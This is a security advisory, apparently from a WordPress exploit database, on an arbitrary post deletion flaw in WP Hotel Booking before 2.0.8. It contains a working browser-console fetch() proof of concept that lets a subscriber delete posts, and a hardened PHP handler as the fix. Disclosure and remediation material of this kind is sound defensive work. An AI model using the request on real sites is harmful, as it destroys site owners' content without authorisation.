Source: wpexploit
Author: Krzysztof Zając (CERT PL)
WPEX-ID: A365C050-96AE-4266-AA87-850EE259EE2C
History: Oct 26, 2023 - 12:00 a.m.

WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion

Tags: arbitrary post deletion, developer console, subscriber user, web browser, ajax request, exploit

AI Score: 7.2 (Confidence: Low)
EPSS: 0 (Percentile: 13.3%)

Description: The plugin does not have authorisation and CSRF checks on its package-removal AJAX action, and does not verify that the item to be deleted is actually a package, allowing any authenticated user, such as a subscriber, to delete arbitrary posts.

Run the command below in the developer console of the web browser while logged in to the blog as a subscriber user. This will put the post with ID 1 in the trash. Run it again to delete the post permanently.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},
  "body": "action=tp_extra_package_remove&package_id=1",
  "method": "POST"
});
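As an added defensive illustration, not the plugin's own code, the sketch below shows what a hardened handler for this AJAX action looks like: it checks a nonce (CSRF), confirms the target is a package post, and requires delete rights on that specific post. The action name comes from the PoC request; the post type slug, function name and nonce field name are assumptions.

```php
<?php
// Hypothetical hardened handler (not WP Hotel Booking's code).
// The action name tp_extra_package_remove is taken from the PoC request;
// the hook name wp_ajax_{action} is the standard WordPress mapping for it.
const HB_PACKAGE_POST_TYPE = 'hb_extra_package'; // assumed slug, use the plugin's real one

add_action( 'wp_ajax_tp_extra_package_remove', 'hb_secure_package_remove' );

function hb_secure_package_remove() {
    // CSRF: the request must carry a nonce issued for this action
    // (created server-side with wp_create_nonce( 'tp_extra_package_remove' )).
    check_ajax_referer( 'tp_extra_package_remove', 'nonce' );

    $package_id = isset( $_POST['package_id'] ) ? absint( $_POST['package_id'] ) : 0;
    if ( ! $package_id ) {
        wp_send_json_error( 'missing package_id', 400 );
    }

    // Type check: refuse to act on anything that is not a package post,
    // so an attacker cannot point the action at an arbitrary post ID.
    if ( get_post_type( $package_id ) !== HB_PACKAGE_POST_TYPE ) {
        wp_send_json_error( 'not a package', 400 );
    }

    // Authorisation: the caller needs delete rights on this specific post.
    // A subscriber does not have this capability, so the request is rejected here.
    if ( ! current_user_can( 'delete_post', $package_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    if ( ! wp_trash_post( $package_id ) ) {
        wp_send_json_error( 'trash failed', 500 );
    }
    wp_send_json_success( array( 'package_id' => $package_id ) );
}
```

Each of the three checks closes one of the gaps named in the description; the nonce alone is not sufficient, since a logged-in subscriber can obtain a valid nonce from a page that embeds it.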
